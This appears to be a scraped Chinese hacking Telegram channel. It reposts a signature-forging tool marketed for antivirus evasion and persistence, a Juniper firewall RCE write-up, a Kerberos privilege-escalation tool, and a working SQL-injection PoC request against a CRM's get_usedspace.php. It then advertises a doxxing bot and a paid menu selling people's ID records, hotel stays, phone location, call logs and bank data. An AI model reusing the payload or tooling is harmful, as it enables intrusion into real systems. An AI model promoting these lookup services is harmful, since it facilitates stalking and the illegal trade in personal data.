Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。
https://github.com/langsasec/Sign-Sacker
https://github.com/langsasec/Sign-Sacker
GitHub
GitHub - langsasec/Sign-Sacker: Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。
Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。 - langsasec/Sign-Sacker
👍6❤4😁2
Juniper 防火墙RCE
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。
https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。
https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
❤9👍9
畅捷CRM get_usedspace.php SQL注入漏洞 poc
GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: x.x.x.x
GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: x.x.x.x
👍17❤12
SeTcbPrivilege允许您读取LSA存储,从TGT中提取会话密钥,并伪造请求TGS
使用Kerberos TGS从本地管理员到域管理员
https://github.com/foxlox/GIUDA
使用Kerberos TGS从本地管理员到域管理员
https://github.com/foxlox/GIUDA
GitHub
GitHub - foxlox/GIUDA: Ask a TGS on behalf of another user without password
Ask a TGS on behalf of another user without password - foxlox/GIUDA
👍16❤10
一个开箱即用的windows 11渗透测试工具箱
本环境旨在提供一个开箱即用的windows渗透测试环境;建议运行环境:【vmware:17.0 】 /【运行内存:8G】 /【固态硬盘:100G】
下载链接:https://www.123pan.com/s/q59KVv-T4Qpd.html 提取码:wpst文件大小:8.55GB,解压后:23.2GB
下载链接:https://www.123pan.com/s/q59KVv-tvQpd.html 提取码:wpst文件大小:7.13 GB,解压后:17.6GB
❤59👍44👎3
🎉 【🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-🅥 资源公开频道回归】 🎉
亲爱的朋友们,
经过一段时间的调整和更新,我们的 资源公开频道 @BOX_GK(本频道)终于回归啦!🎉
现在,大家可以继续关注并获取最新的技术资源、社工库、数据、白嫖资源、教程等内容!📢
🔑 频道权限恢复:大家可以继续订阅和关注频道,及时获得黑盒团队发布的最新资源和技术分享。
⚙️ 频道内容更新:包括各种免费的技术资源、教程、社工库、数据等实用信息,帮助大家更高效地搬砖、学习和成长。
💬 我们诚挚地邀请所有订阅者继续关注频道内容,获取黑盒团队精心整理和分享的最新资源,助力大家在技术、学习等各方面进步!
🔗 社工库➭➭➭ @BOXsgkbot
🔗 官方频道➭➭➭ @HeiheSGK
🔗 官方社区➭➭➭ @BOX_SQ
🔗 合作投稿➭➭➭ @CMDexe
亲爱的朋友们,
经过一段时间的调整和更新,我们的 资源公开频道 @BOX_GK(本频道)终于回归啦!🎉
现在,大家可以继续关注并获取最新的技术资源、社工库、数据、白嫖资源、教程等内容!📢
🔑 频道权限恢复:大家可以继续订阅和关注频道,及时获得黑盒团队发布的最新资源和技术分享。
⚙️ 频道内容更新:包括各种免费的技术资源、教程、社工库、数据等实用信息,帮助大家更高效地搬砖、学习和成长。
💬 我们诚挚地邀请所有订阅者继续关注频道内容,获取黑盒团队精心整理和分享的最新资源,助力大家在技术、学习等各方面进步!
🔗 社工库➭➭➭ @BOXsgkbot
🔗 官方频道➭➭➭ @HeiheSGK
🔗 官方社区➭➭➭ @BOX_SQ
🔗 合作投稿➭➭➭ @CMDexe
👍67❤60👎6🔥4🙈4👏1😁1
#付费查询业务导航 #模板表下方蓝色字体
——————————————————-
提供身份证号***
个人户籍 身份正反 民政婚姻 全家户籍
开房记录 同住记录 飞火记录 超级关联
身份轨迹 犯罪记录 案件笔录 护照正反
名下房产 名下车辆 名下手机 名下公司
工作单位 学籍学历 企业法人 名下银行
提供手机号***
机主证件 通话记录 支付宝流水 打车记录
手机定位 快递地址 外卖地址 手机历史轨迹
提供微信号***
微信手机 微信实名 好友提取 微信流水
提供车牌号***
车辆轨迹 车辆档案 车主手机
提供银行卡号***
银行卡卡主信息 银行卡冻结原因
以上都没有???
模糊找人 人脸识别 抖音实名
——————————————————-
提供身份证号***
个人户籍 身份正反 民政婚姻 全家户籍
开房记录 同住记录 飞火记录 超级关联
身份轨迹 犯罪记录 案件笔录 护照正反
名下房产 名下车辆 名下手机 名下公司
工作单位 学籍学历 企业法人 名下银行
提供手机号***
机主证件 通话记录 支付宝流水 打车记录
手机定位 快递地址 外卖地址 手机历史轨迹
提供微信号***
微信手机 微信实名 好友提取 微信流水
提供车牌号***
车辆轨迹 车辆档案 车主手机
提供银行卡号***
银行卡卡主信息 银行卡冻结原因
以上都没有???
模糊找人 人脸识别 抖音实名
🤯267😱125👍101❤82🥰14🤣13🤮6
尊敬的用户:
由于不可抗力因素,原🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿 -社工库🅥机器人出现掉线情况。目前我们已完成新的机器人部署并恢复服务,所有用户数据保持不变,不受任何影响。
社工庫: @sgkboxbot
请您使用新的应用继续访问,如有任何问题可随时联系客服。给您带来的不便,敬请谅解,感谢您的理解与支持。
由于不可抗力因素,原🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿 -社工库🅥机器人出现掉线情况。目前我们已完成新的机器人部署并恢复服务,所有用户数据保持不变,不受任何影响。
社工庫: @sgkboxbot
请您使用新的应用继续访问,如有任何问题可随时联系客服。给您带来的不便,敬请谅解,感谢您的理解与支持。
❤19👍2